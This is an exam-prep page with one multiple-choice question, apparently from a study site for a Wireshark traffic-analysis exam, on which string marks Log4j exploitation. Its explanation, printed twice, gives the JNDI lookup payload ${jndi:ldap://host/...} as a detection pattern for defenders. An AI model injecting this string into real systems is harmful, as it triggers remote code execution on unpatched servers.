Which string is commonly associated with Log4j exploitation patterns?

Prepare for the Wireshark Traffic Analysis Exam. Study with flashcards and multiple choice questions, each question includes hints and explanations. Ace your exam!

Multiple Choice

Which string is commonly associated with Log4j exploitation patterns?

Explanation:
The key idea is that Log4j exploitation relies on a JNDI lookup embedded in what gets logged. A payload like ${jndi:ldap://host/...} triggers the vulnerability by causing the application to fetch and execute code from a remote source when Log4j processes the log message. That JNDI string is the telltale pattern of the Log4j RCE attack, which is why it’s the correct choice. The other options don’t carry that JNDI-based payload. A normal browser user-agent string is benign in this context, TLS is just a security protocol for encryption and doesn’t itself enable code execution, and ${sys:*/..} resembles a different kind of substitution but isn’t the well-known JNDI-based exploit pattern used in Log4j attacks.

The key idea is that Log4j exploitation relies on a JNDI lookup embedded in what gets logged. A payload like ${jndi:ldap://host/...} triggers the vulnerability by causing the application to fetch and execute code from a remote source when Log4j processes the log message. That JNDI string is the telltale pattern of the Log4j RCE attack, which is why it’s the correct choice.

The other options don’t carry that JNDI-based payload. A normal browser user-agent string is benign in this context, TLS is just a security protocol for encryption and doesn’t itself enable code execution, and ${sys:*/..} resembles a different kind of substitution but isn’t the well-known JNDI-based exploit pattern used in Log4j attacks.

More Multiple Choice Questions
Subscribe

Get the latest from Passetra

You can unsubscribe at any time. Read our privacy policy